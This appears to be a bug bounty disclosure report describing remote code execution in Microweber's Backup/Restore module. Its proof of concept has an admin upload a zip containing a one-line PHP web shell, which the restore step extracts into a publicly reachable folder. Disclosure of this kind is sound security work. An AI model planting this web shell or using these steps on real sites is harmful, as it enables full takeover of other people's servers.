Abusing Backup/Restore feature to achieve Remote Code Execution in microweber/microweber
Reported on
Mar 9th 2022
Description
Admin can use Backup
modules to upload a malicious PHP file, which can lead to RCE.
Proof of Concept
- Log in as admin, navigate to Modules -> Backup:
https://demo.microweber.org/demo/admin/view:modules/load_module:admin__backup
- Prepare a malicious PHP file, in this case
info2.php
<?php system($_GET['cm']); ?>
- Compress this file to
info2php.zip
, then clickUpload your backup
.
- After successfully uploaded, click to Restore, choose Try to overwrite content by Names & Titles, then Start Restore
- The system returns Import format not supported
- However, the malicious file
info2.php
is unzipped and located in/userfiles/
, and that malicious PHP file can be accessible by anyone:
Impact
Remote code execution (RCE) attacks allow an attacker to remotely execute malicious code on a computer. The impact of an RCE vulnerability can range from malware execution to an attacker gaining full control over a compromised machine.
Hi @bobimicroweber, since the report was validated, should I remove the malicious file on the demo server? Or will you reset the site later?
Thank you!